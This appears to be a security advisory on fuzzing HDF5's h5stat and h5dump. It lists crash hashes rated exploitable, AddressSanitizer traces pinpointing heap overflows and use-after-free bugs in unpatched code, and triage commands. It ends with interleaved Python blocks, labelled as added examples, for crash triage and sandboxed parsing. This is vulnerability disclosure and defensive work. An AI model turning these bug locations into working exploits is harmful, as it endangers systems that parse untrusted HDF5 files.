76a27427f63a1ca8e7b9acade505c983 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
8ebfabca399c9882144390c2824a9956 UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
a8bf502b9051d547760292a54908d0de EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
b3358eb6912b440e85afbf1eaf8aab37 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
cc5fc6037ddcd3d5597e49a12e3ddf9d PROBABLY_NOT_EXPLOITABLE The target crashed on a floating point exception. This may indicate a division by zero or a number of other floating point errors. It is generally difficult to leverage these types of errors to gain control of the processor.
e008d3608912f88ae83aebe70689dcdf UNKNOWN The target crashed due to an access violation but there is not enough additional information available to determine exploitability.
f93c69013478b5b9eab33f7412e947d1 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
ffb3610ce23ccaed3c1d45ce5c17f47b EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior's process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.

H5Dump Fuzzing

h5dump was fuzzed using the h5stat-input-corpus.tar.gz input corpus. The h5dump utility was not initially selected for fuzzing due to slower run times and fuzzed test cases that resulted in memory exhaustion and infinite loop conditions. These issues reduced the total number of fuzzed test case executions against h5dump: approximately 10 million test cases were executed in total. At the conclusion of testing, AFL++ was still finding new code paths and crashes, which indicates that further issues are likely to be identified by continued fuzzing of h5dump.

A total of 89 unique memory corruption issues were discovered in h5dump based on major stack hashes. For brevity, the following table details only the 35 memory corruption issues in h5dump which the exploitable plugin classified as exploitable or potentially exploitable. As with the h5stat tables above, this is not intended to provide commentary around real-world exploitability.

Filename Exploitability Explanation
07d6b324b8474a569ce13b34d919e125 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
0c9d1718599c629f6ae2dc253e9f556c EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
0e71c9cac751ed2550aee102e2956181 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
0e847373645d83c271065efc23814701 PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
11049a56a4235093e6845a27021af15e PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
161b33e54715856dee6cc2036046d00b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
21fcde769605d7419d5ddd86bcb2c0ab EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
2b99439e944dd50e495b73506a80c7cb PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
2c39afc2cd6c7e4a43a6133681d1284f EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
2ca00f445e035ee71f6efb7a0ed388dc PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
38344f8077c3bdcc40d4c88cf1b67086 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
4030f62b172d41bffcaea19c3563f2d6 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
47a6f97d7f311db2fd03345389950c1b EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
56351b62615dd0aee14cfff22670150b PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
56707228c5602b4f9032e5c5076ae951 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
6ad05b7df38db254d21dfc55bf055948 EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
6e4dd98178befb28af8863cacbc07093 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
6ff8b28467a0e30bbf353bf6621ed9d2 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
77d3cad25d20e9298344223c8d2d0eaa PROBABLY_EXPLOITABLE The target crashed during a block move, which may indicate that the attacker can control a buffer overflow.
77e001f1dec920766158e041f2367b10 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
95a688f817a2661a035eafbfa5bdb1ce EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
9823d45c52507c162d4aff86ea0e1960 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
9f693cf32c7521f6048dd450c560dc4b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
afe7ee16699107ba82ee3a4b9ac6863b EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
b7aa443ffb1b48ed5f78502053a88176 PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.
b95ca3be3e622a4fc840451d5119aae9 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
bdfc1a84cf389b9fe270ab25ab4cb99f EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
c2a3c435c5a299bac397e5d643bd4c13 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
d550d85ebcaec2936d45249ad2fd96bf EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
e3829772c021a3085bea31367c30018d EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
e7dc3fc21e85273a4871a6f1625e40d1 EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control the write address and/or value.
f73304be7d3e45624d4f6651c0688b35 EXPLOITABLE The target’s backtrace indicates that libc has detected a heap error or that the target was executing a heap function when it stopped. This could be due to heap corruption, passing a bad pointer to a heap function such as free(), etc. Since heap errors might include buffer overflows, use-after-free situations, etc. they are generally considered exploitable.
f93c69013478b5b9eab33f7412e947d1 EXPLOITABLE GDB generated an error while unwinding the stack and/or the stack contained return addresses that were not mapped in the inferior’s process address space and/or the stack pointer is pointing to a location outside the default stack region. These conditions likely indicate stack corruption, which is generally considered exploitable.
f9b9a711564f1b8d07be3ce4c243d78b EXPLOITABLE The target crashed on a branch instruction, which may indicate that the control flow is tainted.
fafd175667c03a4fe3963e3cfd403b4b PROBABLY_EXPLOITABLE The target crashed on an access violation at an address matching the destination operand of the instruction. This likely indicates a write access violation, which means the attacker may control write address and/or value. However, it there is a chance it could be a NULL dereference.

30 of the above 35 crashes were reproducible under address sanitizer. The following table summarises the address sanitizer output:

Filename Summary ASAN Summary
07d6b324b8474a569ce13b34d919e125 SEGV caused by a READ memory access in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i
0c9d1718599c629f6ae2dc253e9f556c READ of size 553779201 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
0e71c9cac751ed2550aee102e2956181 WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
0e847373645d83c271065efc23814701 SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
11049a56a4235093e6845a27021af15e READ of size 35329 in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2314 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
161b33e54715856dee6cc2036046d00b SEGV signal caused by a READ memory access in H5T__bit_copy /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:72 in H5T__bit_copy
21fcde769605d7419d5ddd86bcb2c0ab READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
2b99439e944dd50e495b73506a80c7cb No crash under address sanitizer  
2c39afc2cd6c7e4a43a6133681d1284f READ of size 9437208 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
2ca00f445e035ee71f6efb7a0ed388dc READ of size 524296 in H5VM_memcpyvv /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5VM.c:1535 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:806 in __interceptor_memcpy
38344f8077c3bdcc40d4c88cf1b67086 READ of size 3276850 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
4030f62b172d41bffcaea19c3563f2d6 READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
47a6f97d7f311db2fd03345389950c1b READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
56351b62615dd0aee14cfff22670150b READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f
56707228c5602b4f9032e5c5076ae951 No crash under address sanitizer  
6ad05b7df38db254d21dfc55bf055948 Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
6e4dd98178befb28af8863cacbc07093 SEGV caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4429 in H5T__conv_f_f
6ff8b28467a0e30bbf353bf6621ed9d2 No crash under address sanitizer  
77d3cad25d20e9298344223c8d2d0eaa READ of size 407088 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
77e001f1dec920766158e041f2367b10 READ of size 1 in H5T__bit_find /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tbit.c:440 in H5T__bit_find
95a688f817a2661a035eafbfa5bdb1ce No crash under address sanitizer  
9823d45c52507c162d4aff86ea0e1960 READ of size 2097176 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
9f693cf32c7521f6048dd450c560dc4b READ of size 8 in H5G_name_free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Gname.c:565 in H5G_name_free
afe7ee16699107ba82ee3a4b9ac6863b READ of size 25728 in H5T__conv_array /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3586 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
b7aa443ffb1b48ed5f78502053a88176 READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
b95ca3be3e622a4fc840451d5119aae9 READ of size 1441793 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2592 SUMMARY: AddressSanitizer: unknown-crash ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789 in __interceptor_memmove
bdfc1a84cf389b9fe270ab25ab4cb99f WRITE of size 64 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
c2a3c435c5a299bac397e5d643bd4c13 SEGV caused by a READ memory access in H5T__conv_struct /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2318 SUMMARY: AddressSanitizer: SEGV ../../../../src/libsanitizer/sanitizer_common/sanitizer_libc.cpp:64 in __sanitizer::internal_memmove(void*, void const*, unsigned long)
d550d85ebcaec2936d45249ad2fd96bf SEGV caused by a READ memory access in H5T__conv_i_i /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:3964 in H5T__conv_i_i
e3829772c021a3085bea31367c30018d READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
e7dc3fc21e85273a4871a6f1625e40d1 SEGV signal caused by a READ memory access in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: SEGV /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
f73304be7d3e45624d4f6651c0688b35 READ of size 1 in H5T__conv_f_f /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 SUMMARY: AddressSanitizer: heap-use-after-free /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:4428 in H5T__conv_f_f
f93c69013478b5b9eab33f7412e947d1 Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_format.inc:490 in printf_common
f9b9a711564f1b8d07be3ce4c243d78b Stack overflow caused by an infinite loop and stack exhaustion SUMMARY: AddressSanitizer: stack-overflow ../../../../src/libsanitizer/asan/asan_allocator.cpp:361 in __asan::Allocator::ComputeRZLog(unsigned long)
fafd175667c03a4fe3963e3cfd403b4b No crash under address sanitizer  

Compilation and Running

The fuzzed library was compiled from hdf5-1.14.1-2.tar.bz2 on Debian 11 using GCC 10 and the following commands:

export CFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
export CXXFLAGS='-g -fno-omit-frame-pointer -fsanitize=address'
./configure
make -j8
make install

The resulting ./hdf5/bin/h5stat utility was used to triage the crashes found by AFL++, as follows:

$ ./hdf5/bin/h5stat /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
Filename: /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
=================================================================
==207016==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004d00
at pc 0x7fd075cbf269 bp 0x7ffe2ab5ea50 sp 0x7ffe2ab5e200
WRITE of size 64 at 0x602000004d00 thread T0
 #0 0x7fd075cbf268 in __interceptor_memset
../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
 #1 0x7fd0759287f2 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
... omitted for brevity....
==207016==ABORTING

The ./hdf5/bin/h5dump utility was used to triage the h5dump crashes, as follows:

$ ./hdf5/bin/h5dump /home/doi/src/dumpcrashmin/77d3cad25d20e9298344223c8d2d0eaa
HDF5 "exploitable/77d3cad25d20e9298344223c8d2d0eaa" {
GROUP "/" {
 DATASET "ArrayOfStructures" {
 DATATYPE H5T_COMPOUND {
 H5T_STD_I32LE "a_name";
 H5T_IEEE_F32LE "m_name";
 64-bit little-endian floating-point 64-bit precision "c_name";
 H5T_COMPOUND {
 H5T_STRING {
 STRSIZE 1;
 STRPAD H5T_STR_NULLTERM;
 CSET H5T_CSET_ASCII;
 CTYPE H5T_C_S1;
 } "char_name";
 H5T_ARRAY { [33924] 96-bit little-endian floating-point 32-bit
precision } "array_name";
 } "d_name";
 }
 DATASPACE SIMPLE { ( 254 ) / ( 254 ) }
=================================================================
==1132782==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f89d7f5081c
at pc 0x7f89de579541 bp 0x7fff18ac0ae0 sp 0x7fff18ac0290
READ of size 407088 at 0x7f89d7f5081c thread T0
 #0 0x7f89de579540 in __interceptor_memmove ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:789
 #1 0x7f89de0d3bef in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2599
 #2 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
 #3 0x7f89de0d41e1 in H5T__conv_struct_opt /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tconv.c:2586
 #4 0x7f89de09f8ea in H5T_convert /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5T.c:5449
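The triage step above, run over a whole directory of minimised crashes, as an added example that is not code from the advisory or from the HDF5 project: it executes each file under the ASAN build and parses stderr into the "Summary" and "ASAN Summary" columns of the tables above. The tool path and the ASAN_OPTIONS values are assumptions, and the embedded report is constructed from the h5stat output shown above.

```python
"""Batch triage of AFL++ crash files against a sanitizer build of h5stat or h5dump.

Added example, not code from the advisory or from the HDF5 project. It runs each
crash file through the ASAN-instrumented utility and parses stderr into the two
columns of the advisory's ASAN tables: the access line ("WRITE of size 64 in <func>
<file:line>") and the verbatim "SUMMARY: AddressSanitizer:" line. The tool path and
the ASAN_OPTIONS values are assumptions; adjust them to the local build.
"""
import os
import re
import subprocess
from dataclasses import dataclass
from typing import Dict, Optional

# Constructed ASAN report modelled on the advisory's h5stat run (frames on one line,
# as ASAN actually prints them); used by the self-test.
SAMPLE_REPORT = """\
Filename: /home/doi/src/crashmin/4512b0fa12719efa790f5aac035f3e71
=================================================================
==207016==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000004d00
WRITE of size 64 at 0x602000004d00 thread T0
    #0 0x7fd075cbf268 in __interceptor_memset ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778
    #1 0x7fd0759287f2 in H5T__ref_mem_setnull /home/doi/src/triage/hdf5-1.14.1-2-ASAN/src/H5Tref.c:394
SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:778 in __interceptor_memset
==207016==ABORTING
"""

ERROR_RE = re.compile(r"==\d+==ERROR: AddressSanitizer: ([\w-]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)", re.M)
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (.+) (\S+)$", re.M)  # func may contain spaces
SUMMARY_RE = re.compile(r"^SUMMARY: AddressSanitizer: .*$", re.M)


@dataclass
class Triage:
    bug: str                   # ASAN class: heap-buffer-overflow, SEGV, stack-overflow, FPE, ...
    access: Optional[str]      # "WRITE of size 64"; None for SEGV/FPE/stack-overflow reports
    hdf5_frame: Optional[str]  # first non-sanitizer frame, "func /path/file.c:line"
    summary: str               # verbatim SUMMARY line

    def describe(self) -> str:
        """The advisory's 'Summary' column: access (or bug class) plus the HDF5 frame."""
        head = self.access or self.bug
        return f"{head} in {self.hdf5_frame}" if self.hdf5_frame else head


def parse_asan_report(text: str) -> Optional[Triage]:
    """Parse the first ASAN error in `text`; None if the run produced no ASAN report."""
    m = ERROR_RE.search(text)
    if m is None:
        return None
    acc = ACCESS_RE.search(text)
    access = f"{acc.group(1)} of size {acc.group(2)}" if acc else None
    hdf5_frame = None
    for func, loc in FRAME_RE.findall(text):
        # memset/memmove interceptors live in libsanitizer; the first frame inside
        # the library is the one the advisory tables report.
        if "/libsanitizer/" not in loc:
            hdf5_frame = f"{func} {loc}"
            break
    summ = SUMMARY_RE.search(text)
    summary = summ.group(0) if summ else f"SUMMARY: AddressSanitizer: {m.group(1)}"
    return Triage(m.group(1), access, hdf5_frame, summary)


def triage_file(tool: str, path: str, timeout: float = 30.0) -> Optional[Triage]:
    """Run one minimised crash file through the ASAN build and parse its stderr."""
    # abort_on_error=0 keeps the plain SUMMARY line; allocator_may_return_null=1 lets
    # absurd allocation sizes fail inside the library instead of aborting in ASAN.
    env = dict(os.environ,
               ASAN_OPTIONS="abort_on_error=0:detect_leaks=0:allocator_may_return_null=1")
    try:
        proc = subprocess.run([tool, path], capture_output=True, text=True,
                              errors="replace", timeout=timeout, env=env)
    except subprocess.TimeoutExpired:
        # The infinite-loop cases from the fuzzing run land here, not in ASAN.
        return Triage("timeout", None, None, "SUMMARY: no ASAN report; killed after timeout")
    return parse_asan_report(proc.stderr)


def triage_dir(tool: str, crash_dir: str, timeout: float = 30.0) -> Dict[str, Triage]:
    """Triage every file in a directory of minimised crashes, keyed by file name."""
    results: Dict[str, Triage] = {}
    for name in sorted(os.listdir(crash_dir)):
        t = triage_file(tool, os.path.join(crash_dir, name), timeout)
        if t is not None:
            results[name] = t
    return results
```

Point triage_dir at ./hdf5/bin/h5dump and the directory of minimised crashes to regenerate the table above; grouping results by (bug, hdf5_frame) gives a cheap approximation of the major stack hash used for the unique counts.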

Crashing Testcases and Input Corpora

File Description
h5stat-crashes-minimized.tar.gz The 15 crashing test cases for h5stat
h5stat-input-corpus.tar.gz A coverage-based minimised input corpus consolidating the 1,000,000,000 test cases executed during the fuzzing run - Includes 1433 files
h5dump-crashes-minimized.tar.gz The 89 crashing test cases for h5dump

Recommendations

The number and potential severity of the memory corruption vulnerabilities increases the likelihood of compromise when using HDF5 to parse untrusted user data. As fixes are not available for these issues, a system which processes potentially untrusted HDF5 input should implement compensating controls, such as sandboxing the parsing process, file and input validation, and additional authentication and authorisation controls, to minimise the likelihood of a real attacker exploiting these vulnerabilities.
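One way to implement the sandboxing and input validation recommended above, as an added example that is not code from Pulse Security or the HDF5 project: an upload filter on size and the HDF5 superblock signature, followed by a resource-limited, timed parser subprocess so that a crashing, memory-exhausting or looping input takes down only that process. The tool name, the limits and the size cap are assumptions.

```python
"""Compensating controls for a service that parses uploaded HDF5 files.

Added example, not Pulse Security's or the HDF5 project's code. It implements two of
the controls recommended above: input validation (size cap and HDF5 superblock
signature) before the library sees the file, and a parser subprocess with hard
memory and CPU limits plus a wall-clock timeout. Tool name, limits and size cap are
assumptions; the signature bytes and superblock offsets follow the HDF5 file format.
"""
import os
import resource
import subprocess
import tempfile
from typing import Optional, Tuple

HDF5_SIGNATURE = b"\x89HDF\r\n\x1a\n"
MAX_FILE_BYTES = 64 * 1024 * 1024   # assumption: reject uploads above 64 MiB
SIGNATURE_SEARCH_LIMIT = 1 << 20    # assumption: stop looking for the superblock after 1 MiB


def find_superblock(data: bytes) -> Optional[int]:
    """Offset of the HDF5 superblock signature, or None. The format allows it at byte
    0, 512, 1024, 2048, ... (each offset double the previous) so that a wrapper prefix
    is legal; a plain prefix check would wrongly reject such files."""
    offset = 0
    while offset + len(HDF5_SIGNATURE) <= min(len(data), SIGNATURE_SEARCH_LIMIT):
        if data[offset:offset + len(HDF5_SIGNATURE)] == HDF5_SIGNATURE:
            return offset
        offset = 512 if offset == 0 else offset * 2
    return None


def validate_upload(data: bytes) -> Tuple[bool, str]:
    """Reject obvious junk early. A filter, not a safety guarantee: the library locates
    this signature before reading anything else, so every crashing test case in the
    advisory passes it. The sandbox below is the control that matters."""
    if len(data) > MAX_FILE_BYTES:
        return False, "file exceeds size limit"
    if find_superblock(data) is None:
        return False, "no HDF5 superblock signature"
    return True, "ok"


def _limit_child(max_mem: int, cpu_seconds: int) -> None:
    # Runs in the child between fork and exec. RLIMIT_AS bounds the memory-exhaustion
    # inputs and RLIMIT_CPU the infinite-loop inputs even if the parent's timeout is
    # never reached. Caveat: an ASAN build reserves terabytes of shadow address space,
    # so RLIMIT_AS must stay unlimited when this wrapper drives an instrumented tool.
    for which, value in ((resource.RLIMIT_AS, max_mem), (resource.RLIMIT_CPU, cpu_seconds),
                         (resource.RLIMIT_CORE, 0)):  # no core dumps holding user data
        _, hard = resource.getrlimit(which)
        if hard != resource.RLIM_INFINITY:
            value = min(value, hard)  # never raise above the inherited hard limit
        resource.setrlimit(which, (value, value))


def parse_in_sandbox(path: str, tool: str = "h5dump", timeout: float = 10.0,
                     max_mem: int = 512 * 1024 * 1024, cpu_seconds: int = 5) -> Tuple[str, str]:
    """Parse `path` with `tool` in an isolated child. Returns (status, detail) with status
    one of rejected/ok/crashed/timeout/error. `path` is a server-generated name."""
    with open(path, "rb") as fh:
        data = fh.read(MAX_FILE_BYTES + 1)  # one byte past the cap detects oversize files
    ok, why = validate_upload(data)
    if not ok:
        return "rejected", why
    try:
        proc = subprocess.run(
            [tool, path], capture_output=True, timeout=timeout, stdin=subprocess.DEVNULL,
            env={"PATH": os.environ.get("PATH", "")},  # minimal environment for the parser
            preexec_fn=lambda: _limit_child(max_mem, cpu_seconds))
    except subprocess.TimeoutExpired:
        return "timeout", "parser killed after timeout (possible infinite loop)"
    except (FileNotFoundError, subprocess.SubprocessError) as exc:
        return "error", str(exc)
    if proc.returncode < 0:
        # Killed by a signal: SIGSEGV/SIGBUS from memory corruption, SIGXCPU from the CPU cap.
        return "crashed", f"parser killed by signal {-proc.returncode}"
    if proc.returncode != 0:
        return "error", proc.stderr.decode(errors="replace")[:200]
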